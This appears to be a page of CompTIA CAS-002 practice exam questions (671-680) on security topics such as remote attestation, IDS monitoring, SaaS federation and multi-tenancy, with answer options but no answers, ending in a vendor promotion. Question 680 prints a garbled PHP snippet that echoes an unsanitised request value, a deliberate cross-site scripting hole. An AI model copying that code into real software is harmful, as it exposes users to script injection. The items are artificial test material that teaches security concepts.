1. Home
  2. CompTIA
  3. CAS-002

CompTIA CAS-002 Online Practice Questions and Exam Preparation

CAS-002 Exam Details

  • Exam Code
    :CAS-002
  • Exam Name
    :CompTIA Advanced Security Practitioner (CASP+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :733 Q&As
  • Last Updated
    :Jan 22, 2024

CompTIA CAS-002 Online Questions & Answers

  • Question 671:

    Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software form running on mobile devices?

    A. Single sign-on
    B. Identity propagation
    C. Remote attestation
    D. Secure code review

  • Question 672:

    When Company A and Company B merged, the network security administrator for Company A was tasked with joining the two networks. Which of the following should be done FIRST?

    A. Implement a unified IPv6 addressing scheme on the entire network.
    B. Conduct a penetration test of Company B's network.
    C. Perform a vulnerability assessment on Company B's network.
    D. Perform a peer code review on Company B's application.

  • Question 673:

    An intrusion detection system logged an attack attempt from a remote IP address. One week later, the attacker successfully compromised the network. Which of the following MOST likely occurred?

    A. The IDS generated too many false negatives.
    B. The attack occurred after hours.
    C. The IDS generated too many false positives.
    D. No one was reviewing the IDS event logs.

  • Question 674:

    A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concerned about the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of using presence technology?

    A. Insider threat
    B. Network reconnaissance
    C. Physical security
    D. Industrial espionage

  • Question 675:

    Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international

    standards. He has recommended that the company use his cryptographic method.

    Which of the following methodologies should be adopted?

    A. The company should develop an in-house solution and keep the algorithm a secret.
    B. The company should use the CEO's encryption scheme.
    C. The company should use a mixture of both systems to meet minimum standards.
    D. The company should use the method recommended by other respected information security organizations.

  • Question 676:

    An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?

    A. Ensure the SaaS provider supports dual factor authentication.
    B. Ensure the SaaS provider supports encrypted password transmission and storage.
    C. Ensure the SaaS provider supports secure hash file exchange.
    D. Ensure the SaaS provider supports role-based access control.
    E. Ensure the SaaS provider supports directory services federation.

  • Question 677:

    A security company is developing a new cloud-based log analytics platform. Its purpose is to allow:

    Customers to upload their log files to the "big data" platform Customers to perform remote log search

    Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/or discovery

    Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE).

    A. Secure storage and transmission of API keys
    B. Secure protocols for transmission of log files and search results
    C. At least two years retention of log files in case of e-discovery requests
    D. Multi-tenancy with RBAC support
    E. Sanitizing filters to prevent upload of sensitive log file contents
    F. Encrypted storage of all customer log files

  • Question 678:

    A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three changes to deploy a new application onto the network before it is operational. Security now has a significant effect on overall availability. Which of the following would be the FIRST process to perform as a result of these findings?

    A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Reuse the firewall infrastructure on other projects.
    B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Decrease the current SLA expectations to match the new solution.
    C. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. As part of the review ask them to review the control effectiveness.
    D. Review to determine if control effectiveness is in line with the complexity of the solution. Determine if the requirements can be met with a simpler solution.

  • Question 679:

    A small company hosting multiple virtualized client servers on a single host is considering adding a new host to create a cluster. The new host hardware and operating system will be different from the first host, but the underlying virtualization technology will be compatible. Both hosts will be connected to a shared iSCSI storage solution. Which of the following is the hosting company MOST likely trying to achieve?

    A. Increased customer data availability
    B. Increased customer data confidentiality
    C. Increased security through provisioning
    D. Increased security through data integrity

  • Question 680:

    What of the following vulnerabilities is present in the below source code file named `AuthenticatedArea.php'? AuthenticatedArea

    $username = $_REQUEST[`username'];

    if ($username != "") {

    echo "Your username is: " . $_REQUEST[`username']; }else { header)("location: /login.php"

    }

    ?>

    A. Header manipulation
    B. Account disclosure
    C. Unvalidated file inclusion
    D. Cross-site scripting

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.